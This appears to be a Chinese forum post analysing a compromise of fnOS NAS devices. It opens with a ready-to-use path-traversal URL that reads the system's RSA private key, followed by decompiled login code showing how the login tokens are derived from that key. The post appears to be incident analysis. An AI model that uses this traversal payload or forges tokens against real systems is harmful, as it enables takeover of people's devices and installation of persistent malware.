这个 http://x.x.x.x:5666(5667)/app-center-static/serviceicon/myapp/%7B0%7D?size=../../../../usr/trim/etc/rsa_private_key.pem获取受害者的 rsa_private_key.pem,rsa_private_key.pem是用来计算登录用cookie中的longtoken的,攻击者可能是通过这个LFI漏洞获取到longtoken之后登录了飞牛os,然后下发并持久化木马。
/usr/trim/bin/handlers/user.hdl
void do_login(uint64_t session,uid_t uid,int stay_login,uchar *long_token,uchar *inherited_secre t,
handler_extra_t *handler_extra,char *device_name,char *device_type,char *did,
MutValue *result)
{
long lVar1;
bool bVar2;
int iVar3;
MutValue *pMVar4;
passwd *ppVar5;
time_t tVar6;
long *plVar7;
__time_t *p_Var8;
pthread_t pVar9;
uchar *puVar10;
ulong uVar11;
char *pcVar12;
ezpq *peVar13;
char *pcVar14;
void *pvVar15;
undefined8 *puVar16;
undefined1 *puVar17;
long lVar18;
char cVar19;
long in_FS_OFFSET;
uid_t _uid;
undefined1 local_2c8 [32];
undefined1 local_2a8 [32];
stat64 st;
uchar secret [16];
char token [32];
char backid [32];
char machine_id [64];
/* Unresolved local var: bool ret@[???]
Unresolved local var: passwd * pw@[???] */
cVar19 = false;
lVar1 = *(long *)(in_FS_OFFSET + 0x28);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"uid");
PPJson::MutValue::operator=(pMVar4,uid);
pthread_rwlock_rdlock((pthread_rwlock_t *)&locker_passwd_group);
ppVar5 = getpwuid_q(uid);
if (ppVar5 != (passwd *)0x0) {
cVar19 = *ppVar5->pw_shell;
}
pthread_rwlock_unlock((pthread_rwlock_t *)&locker_passwd_group);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"admin");
PPJson::MutValue::operator=(pMVar4,(bool)cVar19);
bVar2 = query_session(session,token);
if (((bVar2) && (bVar2 = query_token(token,&_uid), bVar2)) && (_uid == uid)) {
refresh_token(token);
goto LAB_0010cb9b;
}
if (inherited_secret == (uchar *)0x0) {
iVar3 = rand();
secret[0] = (char)iVar3;
secret[1] = (char)((uint)iVar3 >> 8);
secret[2] = (char)((uint)iVar3 >> 0x10);
secret[3] = (char)((uint)iVar3 >> 0x18);
iVar3 = rand();
secret[4] = (char)iVar3;
secret[5] = (char)((uint)iVar3 >> 8);
secret[6] = (char)((uint)iVar3 >> 0x10);
secret[7] = (char)((uint)iVar3 >> 0x18);
iVar3 = rand();
secret[8] = (char)iVar3;
secret[9] = (char)((uint)iVar3 >> 8);
secret[10] = (char)((uint)iVar3 >> 0x10);
secret[0xb] = (char)((uint)iVar3 >> 0x18);
iVar3 = rand();
secret[0xc] = (char)iVar3;
secret[0xd] = (char)((uint)iVar3 >> 8);
secret[0xe] = (char)((uint)iVar3 >> 0x10);
secret[0xf] = (char)((uint)iVar3 >> 0x18);
secret[0xf] = 'o';
}
else {
secret._0_8_ = *(undefined8 *)inherited_secret;
secret._8_8_ = *(undefined8 *)(inherited_secret + 8);
}
if ((do_login(unsigned_long,unsigned_int,int,unsigned_char*,unsigned_char*,handler_extra_t*,char_ const*,char_const*,char_const*,PPJson::MutValue&)
::mask_rand == '\0') && (iVar3 = __cxa_guard_acquire(), iVar3 != 0)) {
do_login::lexical_block_0::mask_rand = rand();
__cxa_guard_release();
}
if ((do_login(unsigned_long,unsigned_int,int,unsigned_char*,unsigned_char*,handler_extra_t*,char_ const*,char_const*,char_const*,PPJson::MutValue&)
::token_inc == '\0') && (iVar3 = __cxa_guard_acquire(), iVar3 != 0)) {
do_login::lexical_block_0::token_inc.super___atomic_base<int>._M_i = (__atomic_base<int>)ran d();
__cxa_guard_release();
}
token._0_4_ = rand();
tVar6 = time((time_t *)0x0);
token._4_4_ = (undefined4)tVar6;
/* Unresolved local var: memory_order __b@[???] */
token._8_4_ = (uint)do_login::lexical_block_0::token_inc.super___atomic_base<int>._M_i ^
do_login::lexical_block_0::mask_rand;
token._12_4_ = rand();
LOCK();
do_login::lexical_block_0::token_inc.super___atomic_base<int>._M_i =
(__atomic_base<int>)
((int)do_login::lexical_block_0::token_inc.super___atomic_base<int>._M_i + 1);
UNLOCK();
iVar3 = stat64("/usr/trim/etc/rsa_private_key.pem",(stat64 *)&st);
if ((iVar3 == 0) &&
((plVar7 = (long *)__tls_get_addr(&PTR_00134fa8), st.st_mtim.tv_sec != *plVar7 ||
(st.st_mtim.tv_nsec != plVar7[1])))) {
/* Unresolved local var: int fd@[???] */
iVar3 = open("/usr/trim/etc/rsa_private_key.pem",0x80000);
if (-1 < iVar3) {
lseek(iVar3,100,0);
pvVar15 = (void *)__tls_get_addr(&PTR_00134f88);
read(iVar3,pvVar15,0x20);
close(iVar3);
}
p_Var8 = (__time_t *)__tls_get_addr(&PTR_00134fa8);
*p_Var8 = st.st_mtim.tv_sec;
p_Var8[1] = st.st_mtim.tv_nsec;
pVar9 = pthread_self();
__fprintf_chk(_stdout,1,"[%lu]cache secret from file\n",pVar9);
}
puVar10 = (uchar *)__tls_get_addr(&PTR_00134f88);
iVar3 = aes_encrypt(secret,0xf,puVar10,(uchar *)token,(uchar *)(token + 0x10));
if (iVar3 != 0x10) {
/* WARNING: Subroutine does not return */
__assert_fail("aes_encrypt(secret, 15, get_secret_aeskey(), (unsigned char *)token, (unsigned c har *)&token[16]) == 16"
,"/linux-dev/trim/handler_user/user.cpp",0x659,
"void do_login(uint64_t, uid_t, int, unsigned char*, unsigned char*, handler_extra _t*, const char*, const char*, const char*, PPJson::MutValue&)"
);
}
if (long_token == (uchar *)0x0) {
if (stay_login == 0) {
if ((did != (char *)0x0) && (*did != '\0')) {
pcVar12 = (char *)__tls_get_addr(&PTR_00134f40);
if (*pcVar12 == '\0') {
*pcVar12 = '\x01';
puVar16 = (undefined8 *)__tls_get_addr(&PTR_00134fc8);
*puVar16 = "host=/var/run/postgresql user=postgres dbname=trim";
puVar16[1] = 0;
*(undefined4 *)(puVar16 + 2) = 0;
__cxa_thread_atexit(ezpq::~ezpq,puVar16,&__dso_handle);
}
__sprintf_chk(&st,1,0x20,"%d",uid);
peVar13 = (ezpq *)__tls_get_addr(&PTR_00134fc8);
ezpq::execp(peVar13,"DELETE FROM longtoken WHERE did=$1 AND uid=$2",did,&st,0);
}
bVar2 = add_token(token,uid,(uchar *)0x0,did);
if (!bVar2) {
puts("token is exists.");
}
}
else {
/* Unresolved local var: uint64_t checksum@[???]
Unresolved local var: passwd * pw@[???] */
pthread_rwlock_rdlock((pthread_rwlock_t *)&locker_passwd_group);
getpwuid_q(uid);
pthread_rwlock_unlock((pthread_rwlock_t *)&locker_passwd_group);
backid._0_4_ = rand();
backid._4_4_ = uid;
tVar6 = time((time_t *)0x0);
backid._8_8_ = tVar6 + 0x278d00;
iVar3 = stat64("/usr/trim/etc/rsa_private_key.pem",(stat64 *)&st);
if ((iVar3 == 0) &&
((plVar7 = (long *)__tls_get_addr(&PTR_00134fa8), st.st_mtim.tv_sec != *plVar7 ||
(st.st_mtim.tv_nsec != plVar7[1])))) {
/* Unresolved local var: int fd@[???] */
iVar3 = open("/usr/trim/etc/rsa_private_key.pem",0x80000);
if (-1 < iVar3) {
lseek(iVar3,100,0);
pvVar15 = (void *)__tls_get_addr(&PTR_00134f88);
read(iVar3,pvVar15,0x20);
close(iVar3);
}
p_Var8 = (__time_t *)__tls_get_addr(&PTR_00134fa8);
*p_Var8 = st.st_mtim.tv_sec;
p_Var8[1] = st.st_mtim.tv_nsec;
pVar9 = pthread_self();
__fprintf_chk(_stdout,1,"[%lu]cache secret from file\n",pVar9);
}
puVar10 = (uchar *)__tls_get_addr(&PTR_00134f88);
iVar3 = aes_encrypt(secret,0xf,puVar10,(uchar *)backid,(uchar *)(backid + 0x10));
if (iVar3 != 0x10) {
/* WARNING: Subroutine does not return */
__assert_fail("aes_encrypt(secret, 15, get_secret_aeskey(), (unsigned char *)long_token, (u nsigned char *)&long_token[16]) == 16"
,"/linux-dev/trim/handler_user/user.cpp",0x674,
"void do_login(uint64_t, uid_t, int, unsigned char*, unsigned char*, handler_e xtra_t*, const char*, const char*, const char*, PPJson::MutValue&)"
);
}
encode_base64((uchar *)backid,0x28,machine_id);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"longToken");
PPJson::MutValue::operator=(pMVar4,machine_id);
bVar2 = add_token(token,uid,(uchar *)backid,did);
if (!bVar2) {
puts("token is exists.");
}
pcVar12 = (char *)__tls_get_addr();
if ((did == (char *)0x0) || (*did == '\0')) {
if (*pcVar12 == '\0') {
puVar17 = (undefined1 *)__tls_get_addr(&PTR_00134f40);
*puVar17 = 1;
puVar16 = (undefined8 *)__tls_get_addr(&PTR_00134fc8);
*puVar16 = "host=/var/run/postgresql user=postgres dbname=trim";
puVar16[1] = 0;
*(undefined4 *)(puVar16 + 2) = 0;
__cxa_thread_atexit(ezpq::~ezpq,puVar16,&__dso_handle);
}
pcVar12 = device_type;
if (device_type == (char *)0x0) {
pcVar12 = "";
}
pcVar14 = "";
if (device_name != (char *)0x0) {
pcVar14 = device_name;
}
tVar6 = time((time_t *)0x0);
__sprintf_chk(&st,1,0x20,&DAT_0012b22a,tVar6);
lVar18 = 999999999999;
if (stay_login != 2) {
tVar6 = time((time_t *)0x0);
lVar18 = tVar6 + 0x278d00;
}
__sprintf_chk(local_2a8,1,0x20,&DAT_0012b22a,lVar18);
__sprintf_chk(local_2c8,1,0x20,"%d",uid);
peVar13 = (ezpq *)__tls_get_addr(&PTR_00134fc8);
ezpq::execp(peVar13,
"INSERT INTO longtoken(token,uid,overtime,logintime,device_name,device_type) VAL UES($1,$2,$3,$4,$5,$6)"
,machine_id,local_2c8,local_2a8,&st,pcVar14,pcVar12,0);
}
else {
if (*pcVar12 == '\0') {
*pcVar12 = '\x01';
puVar16 = (undefined8 *)__tls_get_addr(&PTR_00134fc8);
*puVar16 = "host=/var/run/postgresql user=postgres dbname=trim";
puVar16[1] = 0;
*(undefined4 *)(puVar16 + 2) = 0;
__cxa_thread_atexit(ezpq::~ezpq,puVar16,&__dso_handle);
}
pcVar12 = device_type;
if (device_type == (char *)0x0) {
pcVar12 = "";
}
pcVar14 = "";
if (device_name != (char *)0x0) {
pcVar14 = device_name;
}
tVar6 = time((time_t *)0x0);
__sprintf_chk(&st,1,0x20,&DAT_0012b22a,tVar6);
lVar18 = 999999999999;
if (stay_login != 2) {
tVar6 = time((time_t *)0x0);
lVar18 = tVar6 + 0x278d00;
}
__sprintf_chk(local_2a8,1,0x20,&DAT_0012b22a,lVar18);
__sprintf_chk(local_2c8,1,0x20,"%d",uid);
peVar13 = (ezpq *)__tls_get_addr(&PTR_00134fc8);
ezpq::execp(peVar13,
"INSERT INTO longtoken(token,uid,overtime,logintime,did,device_name,device_type) VALUES($1,$2,$3,$4,$5,$6,$7) ON CONFLICT(did,uid) DO update set token=$1, overt ime=$3, logintime=$4, device_name=$6, device_type=$7"
,machine_id,local_2c8,local_2a8,&st,did,pcVar14,pcVar12,0);
}
}
puVar10 = (uchar *)backid;
if (inherited_secret == (uchar *)0x0) {
if ((handler_extra->field_0x20 & 0xe) == 2) {
/* Unresolved local var: int aes_len@[???] */
iVar3 = aes_encrypt(secret,0x10,handler_extra->aes_key,handler_extra->aes_iv,puVar10);
if (0x7e < iVar3 - 2U) goto LAB_0010cb51;
}
else {
iVar3 = 0x10;
puVar10 = secret;
}
encode_base64(puVar10,iVar3,machine_id);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"secret");
PPJson::MutValue::operator=(pMVar4,machine_id);
}
}
else {
bVar2 = add_token(token,uid,long_token,did);
if (!bVar2) {
puts("token is exists.");
}
}
LAB_0010cb51:
add_session(session,token);
token_set_login_device(token,device_name,device_type);
encode_base64((uchar *)token,0x20,machine_id);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"token");
PPJson::MutValue::operator=(pMVar4,machine_id);
LAB_0010cb9b:
/* Unresolved local var: uint id@[???] */
add_user_main_session(uid,session,token);
iVar3 = get_new_backid(char*)::_back_id;
LOCK();
get_new_backid(char*)::_back_id = get_new_backid(char*)::_back_id + 1;
UNLOCK();
uVar11 = time((time_t *)0x0);
__sprintf_chk(backid,1,0x20,"%08x%08x",uVar11 & 0xffffffff,iVar3);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"backId");
PPJson::MutValue::operator=(pMVar4,backid);
get_machine_id(machine_id);
pMVar4 = (MutValue *)(**(code **)(*(long *)result + 0x18))(result,"machineId");
PPJson::MutValue::operator=(pMVar4,machine_id);
if (lVar1 == *(long *)(in_FS_OFFSET + 0x28)) {
return;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
2026-1-24 14:27:51
2026-1-24 21:30:59 楼主
如图可以直接访问目录地址为飞牛地址加